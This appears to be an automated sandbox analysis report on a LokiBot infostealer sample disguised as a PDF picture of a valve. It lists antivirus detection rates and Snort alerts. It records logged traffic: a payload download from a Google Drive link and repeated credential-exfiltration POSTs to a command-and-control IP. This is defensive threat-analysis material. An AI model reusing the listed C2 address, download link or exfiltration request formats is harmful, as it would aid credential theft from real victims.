Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Virustotal: Detection: 22%	Perma Link
Source: C:\Users\user\AppData\Roaming\188E93\31437F.exe (copy)	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Roaming\188E93\31437F.exe (copy)	Virustotal: Detection: 22%	Perma Link

Multi AV Scanner detection for submitted file

Source: PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	ReversingLabs: Detection: 23%
Source: PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Virustotal: Detection: 22%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: PTFE Coated Butterfly Valve Picture#U00b7pdf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 216.58.212.142:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.4:49739 version: TLS 1.2

Source: PTFE Coated Butterfly Valve Picture#U00b7pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2148496892.000000000858C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdb source: Slringsnettets.exe, 00000006.00000001.2057003193.0000000000649000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: tem.Core.pdbF# source: powershell.exe, 00000001.00000002.2148496892.000000000858C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: Slringsnettets.exe, 00000006.00000001.2057003193.0000000000649000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: bqm.Core.pdb source: powershell.exe, 00000001.00000002.2148496892.000000000858C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000001.00000002.2128685879.0000000002EA3000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Code function: 0_2_00405FFD FindFirstFileA,FindClose,	0_2_00405FFD
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Code function: 0_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_0040559B
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Code function: 0_2_00402688 FindFirstFileA,	0_2_00402688

Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49740 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49740 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49740 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49741 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49741 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49741 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49742 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49742 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49742 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49744 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49744 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49744 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49745 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49745 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49745 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49746 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49746 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49746 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49747 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49747 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49747 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49748 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49748 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49748 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49749 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49749 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49749 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49750 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49750 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49750 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49751 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49751 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49751 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49752 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49752 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49752 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49753 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49753 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49753 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49754 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49754 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49754 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49755 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49755 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49755 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49756 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49756 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49756 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49757 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49757 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49757 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49758 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49758 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49758 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49759 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49759 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49759 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49760 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49760 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49760 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49761 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49761 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49761 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49762 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49762 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49762 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49763 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49763 -> 45.61.136.239:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49763 -> 45.61.136.239:80

Source: Joe Sandbox View

IP Address: 45.61.136.239 45.61.136.239

Source: Joe Sandbox View

ASN Name: AS40676US AS40676US

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1_n4h_rjLzWi6t1sW7yvUNQ7sooOdFYiY HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1_n4h_rjLzWi6t1sW7yvUNQ7sooOdFYiY&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /index.php/posts.php?file=1951649854775 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4310752Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/posts.php?file=1951649854775 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4310752Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/posts.php?file=1951649854775 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4310752Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/posts.php?file=1951649854775 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4310752Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/posts.php?file=1951649854775 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4310752Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/posts.php?file=1951649854775 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4310752Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/posts.php?file=1951649854775 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4310752Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/posts.php?file=1951649854775 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4310752Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/posts.php?file=1951649854775 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4310752Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/posts.php?file=1951649854775 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4310752Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/posts.php?file=1951649854775 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4310752Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/posts.php?file=1951649854775 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4310752Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/posts.php?file=1951649854775 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4310752Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/posts.php?file=1951649854775 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4310752Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/posts.php?file=1951649854775 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4310752Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/posts.php?file=1951649854775 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4310752Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/posts.php?file=1951649854775 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4310752Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/posts.php?file=1951649854775 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4310752Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/posts.php?file=1951649854775 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4310752Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/posts.php?file=1951649854775 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4310752Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/posts.php?file=1951649854775 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4310752Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/posts.php?file=1951649854775 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4310752Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/posts.php?file=1951649854775 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4310752Content-Length: 149Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.136.239

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1_n4h_rjLzWi6t1sW7yvUNQ7sooOdFYiY HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1_n4h_rjLzWi6t1sW7yvUNQ7sooOdFYiY&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com

Source: unknown

HTTP traffic detected: POST /index.php/posts.php?file=1951649854775 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4310752Content-Length: 176Connection: close

Source: Slringsnettets.exe, 00000006.00000002.2902321188.0000000003288000.00000004.00000020.00020000.00000000.sdmp, Slringsnettets.exe, 00000006.00000002.2902321188.00000000032C6000.00000004.00000020.00020000.00000000.sdmp, Slringsnettets.exe, 00000006.00000002.2902321188.00000000032F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.61.136.239/index.php/comments/feed/
Source: Slringsnettets.exe, 00000006.00000002.2902321188.0000000003288000.00000004.00000020.00020000.00000000.sdmp, Slringsnettets.exe, 00000006.00000002.2902321188.00000000032C6000.00000004.00000020.00020000.00000000.sdmp, Slringsnettets.exe, 00000006.00000002.2902321188.00000000032F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.61.136.239/index.php/feed/
Source: Slringsnettets.exe, 00000006.00000002.2902321188.00000000032C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.61.136.239/index.php/posts.php?file=1951649854775
Source: Slringsnettets.exe, 00000006.00000002.2902321188.0000000003288000.00000004.00000020.00020000.00000000.sdmp, Slringsnettets.exe, 00000006.00000002.2902321188.00000000032C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.61.136.239/index.php/wp-json/
Source: PTFE Coated Butterfly Valve Picture#U00b7pdf.exe, Slringsnettets.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: PTFE Coated Butterfly Valve Picture#U00b7pdf.exe, Slringsnettets.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.2132245200.0000000005D69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.2129183138.0000000004E56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2148496892.00000000085DE000.00000004.00000020.00020000.00000000.sdmp, PTFE Coated Butterfly Valve Picture#U00b7pdf.exe, Slringsnettets.exe.1.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: powershell.exe, 00000001.00000002.2148496892.00000000085DE000.00000004.00000020.00020000.00000000.sdmp, PTFE Coated Butterfly Valve Picture#U00b7pdf.exe, Slringsnettets.exe.1.dr	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000001.00000002.2129183138.0000000004D01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.2148496892.00000000085DE000.00000004.00000020.00020000.00000000.sdmp, PTFE Coated Butterfly Valve Picture#U00b7pdf.exe, Slringsnettets.exe.1.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: powershell.exe, 00000001.00000002.2148496892.00000000085DE000.00000004.00000020.00020000.00000000.sdmp, PTFE Coated Butterfly Valve Picture#U00b7pdf.exe, Slringsnettets.exe.1.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: powershell.exe, 00000001.00000002.2148496892.00000000085DE000.00000004.00000020.00020000.00000000.sdmp, PTFE Coated Butterfly Valve Picture#U00b7pdf.exe, Slringsnettets.exe.1.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 00000001.00000002.2129183138.0000000004E56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Slringsnettets.exe, 00000006.00000001.2057003193.0000000000649000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: Slringsnettets.exe, 00000006.00000001.2057003193.00000000005F2000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Slringsnettets.exe, 00000006.00000001.2057003193.00000000005F2000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: powershell.exe, 00000001.00000002.2129183138.0000000004D01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: Slringsnettets.exe, 00000006.00000002.2902321188.0000000003288000.00000004.00000020.00020000.00000000.sdmp, Slringsnettets.exe, 00000006.00000002.2902321188.00000000032C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.w.org/
Source: Slringsnettets.exe, 00000006.00000003.2105018546.00000000032FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000001.00000002.2132245200.0000000005D69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2132245200.0000000005D69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2132245200.0000000005D69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
